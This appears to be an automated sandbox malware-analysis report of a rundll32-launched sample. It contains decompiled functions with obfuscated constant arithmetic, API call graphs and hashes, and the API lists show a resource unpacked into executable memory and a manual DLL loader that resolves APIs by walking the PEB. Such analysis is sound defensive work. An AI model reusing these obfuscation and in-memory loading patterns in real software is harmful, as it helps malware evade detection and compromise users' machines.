                                                                                                                                  • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                  • Instruction ID: d9bdd3f7ec9845b8c1938d8911ea73938f6db1eb20df988d99dbe5f790a5c4e1
                                                                                                                                  • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                  • Instruction Fuzzy Hash: 4FF0E7B1901208FBDB18EF94D9468EEBFB5EB54314F208299E40466222E7715F949B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E00315BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				unsigned int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				void* _t20;
                                                                                                                                  				struct HINSTANCE__* _t25;
                                                                                                                                  
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t20);
                                                                                                                                  				_v16 = _v16 & 0x00000000;
                                                                                                                                  				_v24 = 0x5faaf9;
                                                                                                                                  				_v20 = 0xab22cd;
                                                                                                                                  				_v12 = 0x8e3542;
                                                                                                                                  				_v12 = _v12 >> 7;
                                                                                                                                  				_v12 = _v12 ^ 0x00089943;
                                                                                                                                  				_v8 = 0x9b967a;
                                                                                                                                  				_v8 = _v8 ^ 0x4689732a;
                                                                                                                                  				_v8 = _v8 ^ 0x4619bdd7;
                                                                                                                                  				E0031AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
                                                                                                                                  				_t25 = LoadLibraryW(_a8); // executed
                                                                                                                                  				return _t25;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryW.KERNEL32(00000000), ref: 00315C6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                  • Instruction ID: aa231f2a9657167dbcbd9a5379fccf12a8144ded94f6ba0ec1a36c047b255708
                                                                                                                                  • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                  • Instruction Fuzzy Hash: 64F0FFB5C0020CFBCF09EFE4DA06AEEBBB4FB44318F108188E91566212D3B54B58DB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E0030B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _t27;
                                                                                                                                  				int _t32;
                                                                                                                                  
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t27);
                                                                                                                                  				_v12 = 0x6268;
                                                                                                                                  				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                                  				_v12 = _v12 + 0xffff2919;
                                                                                                                                  				_v12 = _v12 + 0xffff3e3d;
                                                                                                                                  				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                                  				_v8 = 0xa46433;
                                                                                                                                  				_v8 = _v8 + 0x98ba;
                                                                                                                                  				_v8 = _v8 | 0xc390ebe9;
                                                                                                                                  				_v8 = _v8 + 0xd5b0;
                                                                                                                                  				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                                  				E0031AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                                  				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                                  				return _t32;
                                                                                                                                  			}








                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0030B2C1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                  • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                  • Instruction ID: f421c825b97370d69a8725f27f88511a9b6b870dc38891dfc6f6884a7d3686bc
                                                                                                                                  • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                  • Instruction Fuzzy Hash: 170116B2C04608FFDF45DFD4DD468EEBBB5EB44314F208188B90566262E3728B60AB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                  			E00311E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				void* _t23;
                                                                                                                                  				int _t29;
                                                                                                                                  
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E003120B9(_t23);
                                                                                                                                  				_v16 = _v16 & 0x00000000;
                                                                                                                                  				_v24 = 0x62b4e9;
                                                                                                                                  				_v20 = 0xc383c4;
                                                                                                                                  				_v12 = 0x238243;
                                                                                                                                  				_v12 = _v12 * 0x67;
                                                                                                                                  				_v12 = _v12 ^ 0x0e4d658b;
                                                                                                                                  				_v8 = 0x6564d0;
                                                                                                                                  				_v8 = _v8 ^ 0x2b193590;
                                                                                                                                  				_v8 = _v8 << 0xd;
                                                                                                                                  				_v8 = _v8 ^ 0x8a2acb03;
                                                                                                                                  				E0031AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
                                                                                                                                  				_t29 = CloseHandle(_a12); // executed
                                                                                                                                  				return _t29;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNEL32(00C383C4), ref: 00311EE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                  • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                  • Instruction ID: 4c075abf0e7bd5efd74d9c5959b61f23eee41f6b1145f2cb1f6e43c1db91dbb5
                                                                                                                                  • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                  • Instruction Fuzzy Hash: 050124B5C00208FBCF44EFA4E94A9AEBFB5EB04308F108498E8156B212D7718B64DF91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:16.1%
                                                                                                                                  Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                  Signature Coverage:0%
                                                                                                                                  Total number of Nodes:297
                                                                                                                                  Total number of Limit Nodes:23
10001ff0 32128->32150 32132 100025e8 ___DllMainCRTStartup 32132->32123 32132->32134 32169 77e991 32132->32169 32134->31983 32135 1000264f SetLastError 32135->32123 32138 100019ab 32137->32138 32139 1000199f SetLastError 32137->32139 32138->32103 32138->32104 32138->32134 32139->32138 32144 100019f0 32140->32144 32141 10001a83 32142 10001990 ___DllMainCRTStartup SetLastError 32141->32142 32147 10001a9c 32142->32147 32143 10001a2c VirtualAlloc 32145 10001a50 32143->32145 32146 10001a57 ___DllMainCRTStartup 32143->32146 32144->32141 32144->32143 32149 10001aa0 ___DllMainCRTStartup 32144->32149 32145->32149 32146->32144 32148 10001aa4 VirtualAlloc 32147->32148 32147->32149 32148->32149 32149->32128 32151 10002029 IsBadReadPtr 32150->32151 32160 1000201f 32150->32160 32153 10002053 32151->32153 32151->32160 32154 10002085 SetLastError 32153->32154 32155 10002099 32153->32155 32153->32160 32154->32160 32176 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32155->32176 32157 100020b3 32158 100020bf SetLastError 32157->32158 32162 100020e9 32157->32162 32158->32160 32160->32123 32163 10001cb0 32160->32163 32161 100021f9 SetLastError 32161->32160 32162->32160 32162->32161 32167 10001cf8 ___DllMainCRTStartup 32163->32167 32164 10001e01 32165 10001b80 ___DllMainCRTStartup 2 API calls 32164->32165 32168 10001ddd 32165->32168 32167->32164 32167->32168 32177 10001b80 32167->32177 32168->32132 32170 77ea62 32169->32170 32171 77ea8d 32169->32171 32184 77f8fd 32170->32184 32171->32134 32171->32135 32175->32134 32176->32157 32178 10001b9c 32177->32178 32179 10001b92 32177->32179 32181 10001c04 VirtualProtect 32178->32181 32182 10001baa 32178->32182 32179->32167 32181->32179 32182->32179 32183 10001be2 VirtualFree 32182->32183 32183->32179 32195 77fde0 32184->32195 32186 77ffd1 32208 77ab87 32186->32208 32188 77ea75 32188->32171 32197 7793ed 32188->32197 32193 78dcf7 GetPEB 32193->32195 32194 77a8b0 GetPEB 32194->32195 32195->32186 32195->32188 32195->32193 
32195->32194 32200 77b23c 32195->32200 32204 7846bb 32195->32204 32218 78da22 GetPEB 32195->32218 32219 7747ce GetPEB 32195->32219 32220 77f899 GetPEB 32195->32220 32221 774b61 32195->32221 32198 78aa30 GetPEB 32197->32198 32199 779456 ExitProcess 32198->32199 32199->32171 32201 77b254 32200->32201 32225 78aa30 32201->32225 32205 7846da 32204->32205 32206 78aa30 GetPEB 32205->32206 32207 784729 SHGetFolderPathW 32206->32207 32207->32195 32209 77abb0 32208->32209 32210 774b61 GetPEB 32209->32210 32211 77ad67 32210->32211 32233 777f5d 32211->32233 32213 77ada4 32213->32188 32214 77ad99 32214->32213 32237 781e67 GetPEB 32214->32237 32216 77adc4 32238 781e67 GetPEB 32216->32238 32218->32195 32219->32195 32220->32195 32222 774b74 32221->32222 32239 771ea7 32222->32239 32226 78ab1d 32225->32226 32227 77b2b8 lstrcmpiW 32225->32227 32231 780a0e GetPEB 32226->32231 32227->32195 32229 78ab33 32232 77cdcd GetPEB 32229->32232 32231->32229 32232->32227 32234 777f8e 32233->32234 32235 78aa30 GetPEB 32234->32235 32236 777fd4 CreateProcessW 32235->32236 32236->32214 32237->32216 32238->32213 32240 771ebc 32239->32240 32243 77702c 32240->32243 32244 777049 32243->32244 32245 78aa30 GetPEB 32244->32245 32246 771f4c 32245->32246 32246->32195

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                  • _printf.LIBCMT ref: 1001265F
                                                                                                                                  • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                  • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                  • _malloc.LIBCMT ref: 100127F5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                  • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                  • API String ID: 572389289-2839844625
                                                                                                                                  • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                  • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                  • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                  • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                  • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                  • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                  • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                  • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                  • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                    • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                    • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                    • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap_malloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 501242067-0
                                                                                                                                  • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                  • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                  • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                  • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                  • GlobalHandle.KERNEL32(00207AD0), ref: 100208A9
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                  • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                  • GlobalHandle.KERNEL32(00207AD0), ref: 100208DB
                                                                                                                                  • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                  • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                  • _memset.LIBCMT ref: 10020911
                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 496899490-0
                                                                                                                                  • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                  • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                  • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                  • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • __lock.LIBCMT ref: 1002FA87
                                                                                                                                    • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                    • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                    • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                  • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714421763-0
                                                                                                                                  • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                  • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                  • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                  • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                  • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CreateDestroy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3296620671-0
                                                                                                                                  • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                  • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                  • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                  • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 250 10001a83-10001a9e call 10001990 247->250 251 10001a1d-10001a2a 247->251 249 10001b0b-10001b0e 248->249 260 10001aa0-10001aa2 250->260 261 10001aa4-10001ac9 VirtualAlloc 250->261 253 10001a2c-10001a4e VirtualAlloc 251->253 254 10001a7e 251->254 255 10001a50-10001a52 253->255 256 10001a57-10001a7b call 100017c0 253->256 254->246 255->249 256->254 260->249 263 10001acb-10001acd 261->263 264 10001acf-10001afe call 10001810 261->264 263->249 264->248
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                  • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.503139641.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503274331.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503282284.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503287724.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                  • Associated: 0000000B.00000002.503294587.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
